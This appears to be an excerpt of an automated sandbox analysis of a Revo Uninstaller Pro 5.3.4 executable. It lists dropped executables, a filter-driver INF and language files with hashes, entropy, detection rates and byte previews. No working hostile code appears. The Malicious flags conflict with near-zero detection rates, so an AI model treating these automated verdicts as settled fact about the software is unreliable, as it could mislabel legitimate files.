                                                                                                                                                                          MD5:5E2DAB5ED4703B7FA05508A82FB89D69
                                                                                                                                                                          SHA1:DA4616D9FD7245BF0410291B90D4C72215159F0B
                                                                                                                                                                          SHA-256:84EC9BC4133175E6E1DB997E650F53EF14448119F5B1FDFF8ED84F1B4DC5FEDD
                                                                                                                                                                          SHA-512:FE42EA532F58D55FB7ACC53B2B8322F8B60E30EDE050032399E8D3F2AEE1F2967B46863557547E267D6AA52DCE14FA2694F306697CE9C0660BEF898F985DFFCF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..........zT.)T.)T.).Iy)@.).Iz)}.)..(C.)..(e.)...(V.).I{)..).I|)G.).uO)V.)o..(..)o..(X.)o..(..).Ig)i.)T.)..)..(..).w)U.)T..)U.)..(U.)RichT.)........................PE..d....JMg..........#.........\.......1Q........@.....................................R.... .....................................................0...............|....f...J..............p.......................(....................................................text...j......................... ..`.rdata...s3......t3................@..@.data........p.......L..............@....pdata..|...........................@..@.gfids..,...........................@..@.giats..............................@..@.tls................................@....rsrc...............................@..@........................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25576112
                                                                                                                                                                          Entropy (8bit):6.723822651268559
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:pTOgY7cLQJlZxfRRHfpvuPTxhbmWqPWpyR1pOIIIIIIIIIIIIIIIIIIIIIIIIIIj:pPY7WQJlvf4FhlqPWpyR1pVk
                                                                                                                                                                          MD5:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                                                          SHA1:FA6FDE156D571986B6DFD94C290DAA80A75E8020
                                                                                                                                                                          SHA-256:9652F60DE7AE4AA0970578974B1886E17A0CE7B6B68BA0F3E713B34EC3636071
                                                                                                                                                                          SHA-512:7EFDA209EE106A26B40858040AEF9A1FC389284A1B171C9729EDBF0005E213AD536850AFCFC66083A81D724E52B50833E1E5CE2AA1CC108CAFA7E8CC9B331ED8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........zT.)T.)T.).Iu)@.).Iv)}.)..(C.)..(e.)...(V.).Iw)..).Ip)G.).uC)V.)o..(..)o..(X.)o..(..).Ik)i.)T.)..)..(..).{)U.)T..)U.)..(U.)RichT.)........PE..d....IMg..........#......R...n........P........@.......................................... .....................................................0....P..........t........J..........@9..p...................H:..(....9...............p...............................text...jQ.......R.................. ..`.rdata..,~3..p....3..V..............@..@.data...x.........................@....pdata..t...........................@..@.gfids..,....`.......n..............@..@.giats.......0.......6..............@..@.tls.........@.......8..............@....rsrc........P.......:..............@..@........................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):179964
                                                                                                                                                                          Entropy (8bit):6.986303683816821
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:H5+pMHMfwXZawAuYNvCLBowkvWei9tL5KYps9/1Kj/9aG2l50:H5+p9wXMBgmvhctWrG
                                                                                                                                                                          MD5:18011FE26C01E02E939389868CB6B771
                                                                                                                                                                          SHA1:8FF97E84AD54A9279B908D5C66DA34736AD85541
                                                                                                                                                                          SHA-256:B370F4BFD94F61776FC84CF617EDB644C9ADDF4B02B0DAF14926A95D68FA7C11
                                                                                                                                                                          SHA-512:9051C26D30EE2B34359FF6508835508032D1434BD8596FD69ADBB73738829BCB2DA07ED03BFA10F2A07E654E43BD7C62E908372915EECAFAC6B2C585A6241829
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@..e6............@..........................@............@.........................................................................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x#..........................@....ndata...................................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Windows setup INFormation
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2444
                                                                                                                                                                          Entropy (8bit):4.986959697467434
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                                                          MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                                                          SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                                                          SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                                                          SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DestinationDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):40240
                                                                                                                                                                          Entropy (8bit):6.679041686686874
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:5UKM0N2alRO3gpeBJNUG+ML1naP6IXW0hzbhL7bCEMmo2ocAhu:DX+RtTL1naP6IzbhjCEDo2/Ahu
                                                                                                                                                                          MD5:498C3D4D44382A96812A0E0FF28D575B
                                                                                                                                                                          SHA1:C34586B789CA5FE4336AB23AD6FF6EEB991C9612
                                                                                                                                                                          SHA-256:23CB784547268CF775636B07CAC4C00B962FD10A7F9144D5D5886A9166919BBA
                                                                                                                                                                          SHA-512:CE450128E9CA1675EAB8AA734DC907DFC55F3DACD62503339080D6BD47B2523D063786DBE28E6833DB041F1D5869670BE2411A39C7B8D93D05A98B4C09CAD1A1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..x...x...x...x...H..._u..}..._u..z...q.~.z...q.h.y..._u..{...q.t.{...q.i.y...q.l.y...Richx...........................PE..d...5.;K.........."......N..........................................................u...........................................................<............p.......b..0;...... ....Q...............................................P...............................text...;6.......8.................. ..h.rdata.......P.......<..............@..H.data...X....`.......B..............@....pdata.......p.......D..............@..HPAGE.................F.............. ..`INIT....v............N.............. ....rsrc................\..............@..B.reloc..z............`..............@..B........................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Windows setup INFormation
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2444
                                                                                                                                                                          Entropy (8bit):4.986959697467434
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                                                          MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                                                          SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                                                          SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                                                          SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DestinationDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                          Entropy (8bit):6.303083119559888
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                                                          MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                                                          SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                                                          SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                                                          SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (606), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):111866
                                                                                                                                                                          Entropy (8bit):3.472213776386747
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:loS7XtdYZqA5IIsJ4FC3P7EHjz7yhYe3w67kiG2ShuJVf6:Fbtnd2m0s6
                                                                                                                                                                          MD5:A911C2F3BDA6270E6D66F26F41094C9F
                                                                                                                                                                          SHA1:EAEA65B48486E81C369AE6C5185C66A5E901511C
                                                                                                                                                                          SHA-256:81B0F02756D39A5772C70AD0F0A85D4091A9C53F72DC8F69FF1738B3CC05F964
                                                                                                                                                                          SHA-512:67455DA740703FA81CA7D042C4ECB57B19DAC985C0D39E82A4539AF5E536A20A57E6B47A1651385FFE1C36DC5D0A53D11538661E7BEBB13D719D35F52F858B29
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.e.s.t.i./.E.s.t.o.n.i.a.n.....W.e.b.L.a.n.g.=.E.S.T.....T.r.a.n.s.l.a.t.o.r.=.t.u.d.i.l.u.d.i. .-. .t.u.d.i.l.u.d.i...e.s.t.o.n.i.a.@.m.a.i.l...e.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...3...8.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.a.a.d.e.....1.0.3. .=. .S.u.v.a.n.d.i.d.....1.0.4. .=. .E.e.m.a.l.d.a.j.a.....1.0.5. .=. .T.....r.i.i.s.t.a.d.....1.0.6. .=. .J...l.i.t.a.j.a. .r.e.~.i.i.m.....1.0.7. .=. .N.i.m.e.k.i.r.i.....1.0.8. .=. .I.k.o.o.n.i.d.....1.0.9. .=. .D.e.t.a.i.l.i.d.....1.1.0. .=. .E.e.m.a.l.d.a.....1.1.1. .=. .K.u.s.t.u.t.a. .s.i.s.s.e.k.a.n.n.e.....1.1.2. .=. .V...r.s.k.e.n.d.a.....1.1.3. .=. .O.l.e.d. .k.i.n.d.e.l.,. .e.t. .s.o.o.v.i.d. .v.a.l.i.t.u.d. .s.i.s.s.e.k.a.n.d.e. .k.u.s.t.u.t.a.d.a.?.....1.1.4. .=. .O.l.e.d. .k.i.n.d.e.l.,. .e.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):107284
                                                                                                                                                                          Entropy (8bit):3.4850832386228205
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:LqsTLW4zJl0dBdBN86bz6M+fnZPjJPvY/:WIq
                                                                                                                                                                          MD5:6D908FC7ABF104D6F8D6DE6741DBD279
                                                                                                                                                                          SHA1:3771939E5D0F6DE53F1E07691DCB2A4AC70041F2
                                                                                                                                                                          SHA-256:3A99D61A738A7CF3D80581B731FF9070F31CBFB046EC9DE7CBC5C06B76EFA89D
                                                                                                                                                                          SHA-512:1A75B6FDB923281FF66EC33E3872F27BF3E928006D18D6C987951AE4AC02CC06DBF15CDBEF15B94152698FCB1E0DF1D85A7BE7DF73D72C9E83B23D049E182ECF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.D.o.k.u.m.e.n.t.i. .i. .g.j.u.h.e.s. .i. .R.e.v.o. .U.n.i.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....;.T.r.a.n.s.l.a.t.e.d. .b.y. .K.l.a.u.s. .V.e.l.i.u.....;.C.o.n.t.a.c.t. .k.l.a.u.s.v.e.l.i.u.@.h.o.t.m.a.i.l...c.o.m.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.h.q.i.p./.A.l.b.a.n.i.a.n.....W.e.b.L.a.n.g.=.A.L.....T.r.a.n.s.l.a.t.o.r.=.K.l.a.u.s. .V.e.l.i.u. .e.-.m.a.i.l.:. .k.l.a.u.s.v.e.l.i.u.@.h.o.t.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...0...8.............[...i.n.s.t.a.l.u.e.s.i. .T.o.o.l.b.a.r.].....1.0.2. .=. .P.a.m.j.a.....1.0.3. .=. .O.p.s.i.o.n.e.t.....1.0.4. .=. ...i.n.s.t.a.l.u.e.s.i.....1.0.5. .=. .M.j.e.t.e.t.....1.0.6. .=. .M.e.n.y.r.a. .e. .g.j.u.e.t.a.r.i.t.....1.0.7. .=. .M.e. .l.i.s.t.i.m.....1.0.8. .=. .M.e. .i.n.k.o.n.a.....1.0.9. .=. .M.e. .d.e.t.a.j.e.....1.1.0. .=. ...i.n.s.t.a.l.o.....1.1.1. .=. .H.i.q. .s.h.e.n.i.m.i.n.....1.1.2. .=. .R.i.f.r.e.s.k.o.....1.1.3. .=. .J.e.n.i.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (608), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):116810
                                                                                                                                                                          Entropy (8bit):3.9166739452051953
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:lo/tNe5HzHBOyv7EyqyYjNE7TA4s32rELViqKcc+QTMsUbpUpTk+e7WiBYMUZAj3:tqAEFycUTALVeLKSu+Y9v0OQQERYJ
                                                                                                                                                                          MD5:74FBABDEFEF9CEA6BE1B41CAF6941C15
                                                                                                                                                                          SHA1:FE53FEA79D8B382B6B4915E42FC6C0C7B0D6EBAC
                                                                                                                                                                          SHA-256:A42CBA216AABAAF3272FA6715D16543CDB9F9C008C3F82520DE74F2BB5BCD3A4
                                                                                                                                                                          SHA-512:2760A317C6BE76291D94687E3E53AD28FF748338A49DBD381BD386FF798AFFFD09301DF5D81087D744F8773C736E4B19F4397794B555CB096B585B2DF9155062
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .9.1.(.J./.A.r.a.b.i.c.....W.e.b.L.a.n.g.=.A.R.J.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...1...7.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .9.1.6.....1.0.3. .=. ...J.'.1.'.*.....1.0.4. .=. .'.D.:.'.!. .'.D.*.+.(.J.*.....1.0.5. .=. .'.D.'./.H.'.*.....1.0.6. .=. .H.6.9. .'.D.5.J.'./.....1.0.7. .=. .B.'.&.E.).....1.0.8. .=. .'.J.B.H.F.'.*.....1.0.9. .=. .'.D.*.A.'.5.J.D.....1.1.0. .=. .'.D.:.'.!. .'.D.*.+.(.J.*.....1.1.1. .=. .'.2.'.D.). .'.D./...H.D.....1.1.2. .=. .'.F.9.'.4.....1.1.3. .=. .G.D. .'.F.*. .E.*.'.C./. .E.F. .'.F.C. .*.1.J./. .'.2.'.D.). .'.D.'./...'.D. .'.D.E.-././.......1.1.4. .=. .G.D. .'.F.*. .E.*.'.C./. .E.F. .'.F.C. .*.1.J./. .'.D.:.'.!. .*.+.(.J.*. .'.D.(.1.F.'.E.,. .'.D.E.-././.......1.1.5. .
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (315), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):52512
                                                                                                                                                                          Entropy (8bit):4.15365900856631
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:FoBtEKBHU2OaI3Ky4XDv8VCdzNqyqZSD57LT+:zKBH2a2Ky4T8UzNqyqZA57LT+
                                                                                                                                                                          MD5:7B8792AD9FED507599886F0D35F18D88
                                                                                                                                                                          SHA1:81B30BFC236BE7A9CC117DE9A51E2AE9D3CD0264
                                                                                                                                                                          SHA-256:D594C865D9406920BEBF955D60D28B687A261B52299ED39DFE9E68386BFE1C7F
                                                                                                                                                                          SHA-512:18FE03947DDC9669054DA659AD4AE6A4D6B2C71283376C0E63084C309CA17431899F3355E342DA28B079C771061BC29CD42AE8369B3270F2215469A880EF4DAA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.@.a.u.e...e.v./.A.r.m.e.n.i.a.n.....W.e.b.L.a.n.g.=.a.r.m.....T.r.a.n.s.l.a.t.o.r.=.H.r.a.n.t. .O.h.a.n.y.a.n. ....... .h.r.a.n.t.o.h.a.n.y.a.n.@.m.a.i.l...a.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.2...5...9.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .O.e.}...h.....1.0.3. .=. .?.a...c.a.~.x...x...t.v.e.......1.0.4. .=. .K.v.{.k.y.....1.0.5. .=. .3.x...n.k...v.e.......1.0.6. .=. .H.P.M.....1.0.7. .=. .Q.a.v.o.h.....1.0.8. .=. .J.a...o.e...v.e.......1.0.9. .=. .D.a.v...a.t.a.}.v.....1.1.0. .=. .K.v.{.e.l.....1.1.1. .=. .K.v.{.e.l. ...a.u.l.h.....1.1.2. .=. .9.a...t.a...v.e.l.....1.1.3. .=. .K.v.{.e.^.l. .h.v.....~.a.n. .n...a.c...e...h.:.....1.1.4. .=. .K.v.{.e.^.l. .h.v.....~.a.n. .n...a.c.k...h.:.....1.1.5. .=. .;.v...v.a.i.a...t.a...x...t.....1.1.6. .=. .U.c.v.x...i.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (689), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):137338
                                                                                                                                                                          Entropy (8bit):3.822072970240457
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:6DZ2mE0Dzcyamtkk64nvy9w+gIybiSqamOsfYFyF7F5gZOgNyspNiF:6DZ2mE0FamtmmvyNSqam1YMFU7NyspoF
                                                                                                                                                                          MD5:053CBEB9CABDE4426AEED59F89415AA7
                                                                                                                                                                          SHA1:EAE9139D7A15A35D08DB7BBD138130C661D1B651
                                                                                                                                                                          SHA-256:82803769AC1663397AC87CE234B0F8C4640CDF8CACEC8FBDC4C02A0ECA1305E7
                                                                                                                                                                          SHA-512:221579B06BE0FAF79AA9EC63E1A217E8052A87306B0FB4B9377276AFA8DD70C6585C284F2485D947B06063DB7832A89BAF174DA1C361CFAD93EFCB2100A417C8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e. .=. .A.z.Y.r.b.a.y.c.a.n.c.a./.A.z.e.r.b.a.i.j.a.n.i.....W.e.b.L.a.n.g. .=. .A.Z.....T.r.a.n.s.l.a.t.o.r. .=. .M.a.h.i.r. .H.u.s.e.y.n.o.v. .(.u.r.o.b.o.r.o.s.1.3.0.8.7.5.@.g.m.a.i.l...c.o.m.). .....C.o.d.e.p.a.g.e. .=. .U.N.I.C.O.D.E. .....V.e.r.s.i.o.n. .=. .V.e.r.s.i.o.n.=.5...3...0.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .G...r...n.t.......1.0.3. .=. .A.y.a.r.l.a.r.....1.0.4. .=. .P.r.o.q.r.a.m. .s.i.l.i.c.i.....1.0.5. .=. .A.l.Y.t.l.Y.r.....1.0.6. .=. .O.v...u. .r.e.j.i.m.i.....1.0.7. .=. .S.i.y.a.h.1.....1.0.8. .=. .0.k.o.n.l.a.r.....1.0.9. .=. .T.Y.f.Y.r.r...a.t.1. .i.l.Y.....1.1.0. .=. .S.i.l.....1.1.1. .=. .G.i.r.i._.i. .S.i.l.....1.1.2. .=. .Y.e.n.i.l.Y.....1.1.3. .=. .S.i.z. . .s.e...i.l.m.i._. .e.l.e.m.e.n.t.i. .s.i.l.m.Y.k. .i.s.t.Y.d.i.y.i.n.i.z.Y. .Y.m.i.n.s.i.n.i.z.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (739), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):134822
                                                                                                                                                                          Entropy (8bit):4.091712417960198
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:l0g0yS3dFm1917yvw3q7jcVbWcCCPH0iBTkH8NgP2Hb48m++UUaQ:t0yS3dFm6DcCNf
                                                                                                                                                                          MD5:8BA1BEBEA44A0ED3D19B41847BDF014F
                                                                                                                                                                          SHA1:BD02C23FA0D0BD122AC8E461FAAE8A2A17C223AC
                                                                                                                                                                          SHA-256:15E63CF0171687BA26DAFE79D9FDFEF857D737E6C1FA0E5938F35E22C3E2BC4E
                                                                                                                                                                          SHA-512:FEF7EBEFCBDC385C40CE3A05971A4C2E1F685C0E6D78A6282D731AC1CCC2068618A9E2E16CC5D0CAE15ED5A6AEECABB0C8B11804699BE16092BF7B4B9E52353C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=........... ./.B.e.n.g.a.l.i.....W.e.b.L.a.n.g.=.B.N.....T.r.a.n.s.l.a.t.o.r.=.G.o.u.t.a.m. .R.o.y.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...............1.0.3. .=. .........................1.0.4. .=. .........................1.0.5. .=. .............1.0.6. .=. ............. ...........1.0.7. .=. .................1.0.8. .=. .....................1.0.9. .=. .......................1.1.0. .=. .....................1.1.1. .=. ............... ....... .............1.1.2. .=. .............1.1.3. .=. ......... ..... ............... ..... ......... ................... ............... ........... .......?.....1.1.4. .=. ......... ..... ............... ..... ......... ................... ................... ................. ...
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (709), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):138458
                                                                                                                                                                          Entropy (8bit):3.886109011448417
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:qyA2Mkq69Ub7gEzBB3dm0bnx06m+O0wufPduvP4BoNpRwmwQKTlZJLTXYjABYV:ZMkczBBtm0bnx06m+O0wufVuvP4BoN3F
                                                                                                                                                                          MD5:3B7AF4F26FDED0678B85A50A616C7747
                                                                                                                                                                          SHA1:32EE9D746B29C05B9C8C11617C0051A59B0DA0FD
                                                                                                                                                                          SHA-256:8C2E75D77767DF1526DEE187771C97497E46BB06AA69B80A004D4746B0401B8B
                                                                                                                                                                          SHA-512:163ADDD03C30C53C12873B84D86B9A4D28AB39B57FC822B5F3477F6659236881DC7588BAC3D745B0E93A1248156691DA20785AF32E0EDECCD1C951A1CC5DACA1
                                                                                                                                                                          Malicious:false
